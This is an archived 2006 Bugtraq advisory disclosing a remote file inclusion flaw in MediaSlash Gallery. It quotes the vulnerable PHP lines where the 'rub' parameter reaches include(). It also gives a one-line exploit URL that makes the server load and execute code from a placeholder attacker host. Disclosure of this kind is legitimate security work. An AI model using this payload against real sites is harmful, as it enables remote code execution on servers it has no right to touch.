MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability
From: simo64@xxxxxxxxx
Date: 30 Mar 2006 20:39:12 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

author: [Moroccan Security Team]
Vendor: www.MediaSlash.com
Vendor Contacted
greetz to : [Moroccan Security Team] CiM-TeaM and All Freinds
Google : Powered by MediaSlash.com
Details:

MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability
This flaw is due to an input validation error in the "index.php"(line 489)
script that does not validate the "rub" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web 
server
 
Code:
 
27 .            $rub = @$_GET["rub"];
...
57 .            $page_menu = ''.$rub.'/index.php';
489.            <? include($page_menu); ?> //!!!!!!!!


Exploit http://[trajet]/[path]/index.php?rub=http://[attacker]

http://[attacker]/index.php will be included and executed withe
the privileges of the web server

Simo64 Moroccan Security Team :) simo64[at]gmail[dot]com

Prev by Date: Re: recursive DNS servers DDoS as a growing DDoS problem
Next by Date: Oxygen<=1.x.x SQL injection
Previous by thread: [security bulletin] HPSBUX02102 SSRT051078 rev.2 - HP-UX usermod(1M) Local Unauthorized Access.
Next by thread: Re: MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability
Index(es):
- Date
- Thread